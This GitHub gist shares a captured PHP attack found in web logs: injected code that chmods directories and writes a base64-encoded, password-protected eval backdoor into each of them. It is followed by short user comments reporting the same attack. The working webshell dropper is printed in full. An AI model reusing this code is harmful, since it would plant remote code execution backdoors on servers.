Created
February 15, 2013 17:54
-
-
Save bortzmeyer/4962085 to your computer and use it in GitHub Desktop.
PHP attack through log files (code in the User-Agent header)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@ini_set('allow_url_fopen', 1); | |
addLoader(); | |
$data = @opendir('.'); | |
while ($file = @readdir($data)) | |
{ | |
$file = trim($file); | |
if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue; | |
addLoader($file); | |
} | |
@closedir($data); | |
function addLoader($dir = '') | |
{ | |
if ($dir) $dir .= '/'; | |
@chmod($dir, 777); | |
$fp = fopen("{$dir}2716479cdad403d091d623daaf66cd15.php", "w"); | |
fwrite($fp, base64_decode('PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=')); | |
fclose($fp); | |
if (file_exists("{$dir}2716479cdad403d091d623daaf66cd15.php")) | |
{ | |
$ck = "1823649365820354"; | |
print "$ck:{*}:$dir:{*}:"; | |
exit; | |
} |
Hello,
Messed my logs up.
I missed my logs from a pay site.
Created some with PHP.
In my PHP created logs was a large 64-decode chunk where the UA would have been.
I decoded it twice, a piece of 64-decode within a piece.
I was fairly certain it was an attack of some kind.
There IP was from Romania.
Yours exactly the same as mine.
Please check out go.to/moo. corkymoo.net63.net
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Any idea where this was coming from?